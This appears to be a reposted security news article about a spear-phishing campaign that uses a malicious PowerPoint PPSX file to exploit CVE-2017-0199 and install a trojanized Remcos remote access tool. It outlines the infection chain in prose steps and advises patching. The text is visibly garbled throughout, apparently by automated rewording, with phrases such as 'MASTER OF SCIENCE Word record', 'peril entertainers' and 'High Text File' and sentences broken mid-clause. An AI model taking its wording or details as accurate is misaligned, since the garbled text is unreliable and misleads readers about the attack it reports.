Just how Just Opening A Malevolent Powerpoint File Could Endanger Your Pc

A while back we detailed how opening a basic MASTER OF SCIENCE Word record. Could jeopardize your PC using a basic susceptability in Microsoft Office.

The Microsoft Office far off code execution weakness (CVE-2017-0199) remained in the Windows Subject Linking. And Embedding (OLE) interface for which a fix was given in April this coming year. Yet peril entertainers keep on being manhandling the blemish through various methods.

Security researchers have seen a new malware plan that is leveraging the same exploit, but also for the first time. Hidden at the rear of a specially crafted PowerPoint (PPSX) Presentation file.

Matching to the researchers at Trend Micro, who seen the malware campaign. The targeted attack depends on a convincing spear-phishing email attachment, purportedly from a cable manufacturing provide. And mainly targets companies active in the electronics manufacturing industry.

Experts believe this attack entails the use of a sender address disguised as. A legitimate email dispatched by a sales and billing department.

Here’s Just how the Attack Works:

The complete attack scenario is listed below:

Step 1: The attack starts with a message that consists of a malicious PowerPoint (PPSX) file in the add-on. Pretending to be shipping and delivery information about an order request.
Step 2: When executed, the PPSX record calls an XML data file programmed in it to download “logo. doc” data file from a web-based location. And runs it via the PowerPoint Show animated graphics feature.

Step 3: The malformed Logo. doc record then triggers the CVE-2017-0199 vulnerability. Which downloads. And executes RATMAN. exe on the targeted system.

Stage 4: RATMAN. exe is a Trojanized version of the Remcos Remote Control tool, which when installed. Allows attackers to regulate afflicted computers from its command-and-control server remotely.

Remcos is a legitimate and personalized remote access tool that allows users to control their system from everywhere in the world. With some capabilities, just like a down load and execute the order. A keylogger, a display screen logger, and recorders for both webcam and mic.

Since the exploit is employed to deliver infected High Text File (. RTF) documents, most detection methods for CVE-2017-0199 focuses on the RTF. Therefore, the use of a new PPSX files allows opponents to evade antivirus diagnosis as well.
The simplest way to prevent yourself completely from this assault is to download. And apply patches released by Microsoft in April that will address the CVE-2017-0199 vulnerability.

Leave a Reply